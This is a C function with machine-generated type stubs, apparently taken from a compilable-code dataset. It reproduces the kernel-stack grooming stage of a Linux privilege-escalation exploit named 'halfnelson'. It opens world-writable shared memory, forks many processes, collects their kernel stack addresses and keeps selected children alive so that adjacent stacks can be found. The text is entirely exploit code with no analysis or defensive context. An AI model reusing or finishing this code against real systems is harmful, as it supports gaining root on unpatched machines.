
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;




typedef struct TYPE_4__ TYPE_1__ ;


struct region {int dummy; } ;
struct TYPE_4__ {scalar_t__* addrs; void* parent; } ;


 scalar_t__ KSTACK_DIE ;
 int KSTACK_LOWER ;
 int KSTACK_PARENT ;
 int KSTACK_UNINIT ;
 int KSTACK_UPPER ;
 int MAP_SHARED ;
 int NPROC ;
 int O_CREAT ;
 int O_RDWR ;
 int PROT_READ ;
 int PROT_WRITE ;
 int S_IRWXG ;
 int S_IRWXO ;
 int S_IRWXU ;
 int exit (int) ;
 int fork () ;
 int ftruncate (int,int) ;
 void* get_kstack () ;
 int memset (TYPE_1__*,int ,int) ;
 TYPE_1__* mmap (int *,int,int,int ,int,int ) ;
 int printf (char*,...) ;
 TYPE_1__* region ;
 int shm_open (char*,int,int) ;
 int sleep (int) ;

int
get_adjacent_kstacks(void)
{
 int i, ret, shm, pid, type;


 shm = shm_open("/halfnelson", O_RDWR | O_CREAT, S_IRWXU | S_IRWXG | S_IRWXO);
 if (shm < 0) {
  printf("[-] failed creating shared memory, aborting!\n");
  exit(1);
 }

 ret = ftruncate(shm, sizeof(struct region));
 if (ret != 0) {
  printf("[-] failed resizing shared memory, aborting!\n");
  exit(1);
 }

 region = mmap(((void*)0), sizeof(struct region), PROT_READ | PROT_WRITE, MAP_SHARED, shm, 0);
 memset(region, KSTACK_UNINIT, sizeof(struct region));


 region->parent = get_kstack();

 printf("[+] found parent kstack at 0x%lx\n", region->parent);


 for (i = 0; i < NPROC; ++i) {
  pid = fork();

  if (pid > 0) {
   type = KSTACK_PARENT;
   continue;
  } else if (pid == 0) {

   region->addrs[i] = get_kstack();


   while (1) {
    sleep(1);
    if (region->addrs[i] == KSTACK_DIE) {

     exit(0);
    } else if (region->addrs[i] == KSTACK_UPPER) {

     type = KSTACK_UPPER;
     break;
    } else if (region->addrs[i] == KSTACK_LOWER) {

     type = KSTACK_LOWER;
     break;
    }
   }
   break;
  } else {
   printf("[-] fork failed, aborting!\n");
   exit(1);
  }
 }

 return type;
}
